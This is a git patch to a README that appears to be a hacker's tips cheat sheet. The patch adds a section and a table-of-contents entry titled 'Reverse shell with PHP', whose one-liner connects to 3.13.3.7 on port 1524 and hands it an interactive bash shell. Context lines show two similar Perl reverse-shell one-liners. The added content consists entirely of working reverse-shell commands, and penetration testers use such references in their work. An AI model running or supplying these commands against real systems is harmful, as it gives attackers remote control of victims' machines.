From 562edafa53273bf6edb61e341830e949c7296f5f Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Fri, 24 Jan 2020 15:18:59 +0000
Subject: [PATCH] Update README.md

reverse shell with PHP
---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/README.md b/README.md
index f139f73..4cc599c 100644
--- a/README.md
+++ b/README.md
@@ -30,6 +30,7 @@ Got tricks? Send them to root@thc.org or submit a pull request.
       1. [without Bash](#rswob-anchor)
       1. [with Python](#rswpy-anchor)
       1. [with Perl](#rswpl-anchor)
+      1. [with PHP](#rswphp-anchor)
    1. [Upgrading the dumb shell](#rsu-anchor)
       1. [Upgrade a reverse shell to a pty shell](#rsup-anchor)
       1. [Upgrade a reverse shell to a fully interactive shell](#rsup2-anchor)
@@ -292,6 +293,12 @@ $ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprot
 # method 2
 $ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
 ```
+<a id="rswphp-anchor"></a>
+**5.i.e. Reverse shell with PHP**
+
+```
+php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");'
+```
 
 <a id="rsu-anchor"></a>
 <a id="rsup-anchor"></a>